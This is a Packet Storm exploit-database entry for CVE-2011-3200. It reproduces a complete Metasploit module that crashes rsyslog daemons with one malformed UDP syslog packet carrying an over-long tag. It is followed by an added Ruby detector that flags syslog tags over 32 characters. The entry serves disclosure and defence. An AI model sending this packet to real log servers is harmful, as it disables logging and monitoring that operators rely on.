packetstorm | H D Moore, metasploit.com | PACKETSTORM:180541
History: Aug 31, 2024 - 12:00 a.m.

rsyslog Long Tag Off-By-Two Denial of Service

Source: packetstormsecurity.com
Tags: rsyslog, long tag, off-by-two, dos, overflow, remote log, shutdown, cve-2011-3200

CVSS2: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL

AI Score: 6.9 (Confidence: Low)

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize
    super(
      'Name'        => 'rsyslog Long Tag Off-By-Two DoS',
      'Description' => %q{
        This module triggers an off-by-two overflow in the
        rsyslog daemon. This flaw is unlikely to yield code execution
        but is effective at shutting down a remote log daemon. This bug
        was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.
        Compiler differences may prevent this bug from causing any
        noticeable result on many systems (RHEL6 is affected).
      },
      'Author'      => 'hdm',
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2011-3200'],
          [ 'URL', 'https://www.rsyslog.com/potential-dos-with-malformed-tag/' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=727644' ],
        ],
      'DisclosureDate' => 'Sep 01 2011')

    register_options(
      [
        Opt::RPORT(514)
      ])
  end

  def run
    connect_udp
    # PRI value 174, then a 512-character tag terminated by ':'
    pkt = "<174>" + ("#" * 512) + ":"
    print_status("Sending message containing a malformed RFC3164 tag to #{rhost}")
    udp_sock.put(pkt)
    disconnect_udp
  end
end
```
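A detection-side counterpart to the module above, as an added example that is not part of the original module or of rsyslog: it parses syslog datagrams and flags any whose RFC 3164 TAG exceeds the 32-character limit set in RFC 3164 section 4.1.3. The method names, the rule for where the tag ends, and the sample datagrams are assumptions made for illustration.

```ruby
# Added example: flag syslog datagrams whose RFC 3164 TAG is over-long.
# 32 is the TAG limit from RFC 3164 section 4.1.3; names here are hypothetical.
RFC3164_TAG_MAX = 32
PRI_RE = /\A<(\d{1,3})>/
# Optional RFC 3164 header: "Mmm dd hh:mm:ss HOSTNAME "
HEADER_RE = /\A[A-Z][a-z]{2} [ \d]\d \d{2}:\d{2}:\d{2} (\S+) /

# Returns {pri:, tag:, tag_len:}, or nil when there is no valid PRI part.
def parse_tag(datagram)
  data = datagram.b # treat as raw bytes; network input may not be valid UTF-8
  m = PRI_RE.match(data)
  return nil unless m && m[1].to_i <= 191 # highest PRI: facility 23, severity 7
  rest = m.post_match
  h = HEADER_RE.match(rest)
  rest = h.post_match if h
  # Assumption: the tag ends at the first ':', '[' or whitespace character.
  tag = rest[/\A[^:\[\s]*/]
  { pri: m[1].to_i, tag: tag, tag_len: tag.bytesize }
end

def overlong_tag?(datagram, max: RFC3164_TAG_MAX)
  parsed = parse_tag(datagram)
  !parsed.nil? && parsed[:tag_len] > max
end

# Takes [source, datagram] pairs; returns one alert hash per offending packet.
def scan(packets, max: RFC3164_TAG_MAX)
  packets.each_with_object([]) do |(src, data), alerts|
    parsed = parse_tag(data)
    next unless parsed && parsed[:tag_len] > max
    alerts << { src: src, pri: parsed[:pri], tag_len: parsed[:tag_len] }
  end
end

# Constructed sample traffic (RFC 5737 documentation addresses).
SAMPLES = [
  ['192.0.2.10', "<34>Oct 11 22:14:15 mymachine su: 'su root' failed for lonvick"],
  ['192.0.2.11', '<13>sshd[4721]: Accepted publickey for deploy'],
  ['192.0.2.66', '<174>' + ('#' * 512) + ':'], # shape of the datagram built in run above
  ['192.0.2.12', 'not a syslog line']
].freeze

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLES).each { |a| puts "ALERT src=#{a[:src]} pri=#{a[:pri]} tag_len=#{a[:tag_len]}" }
end
```

Some legitimate senders emit tags longer than 32 characters, so `max:` can be raised to suit the environment.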
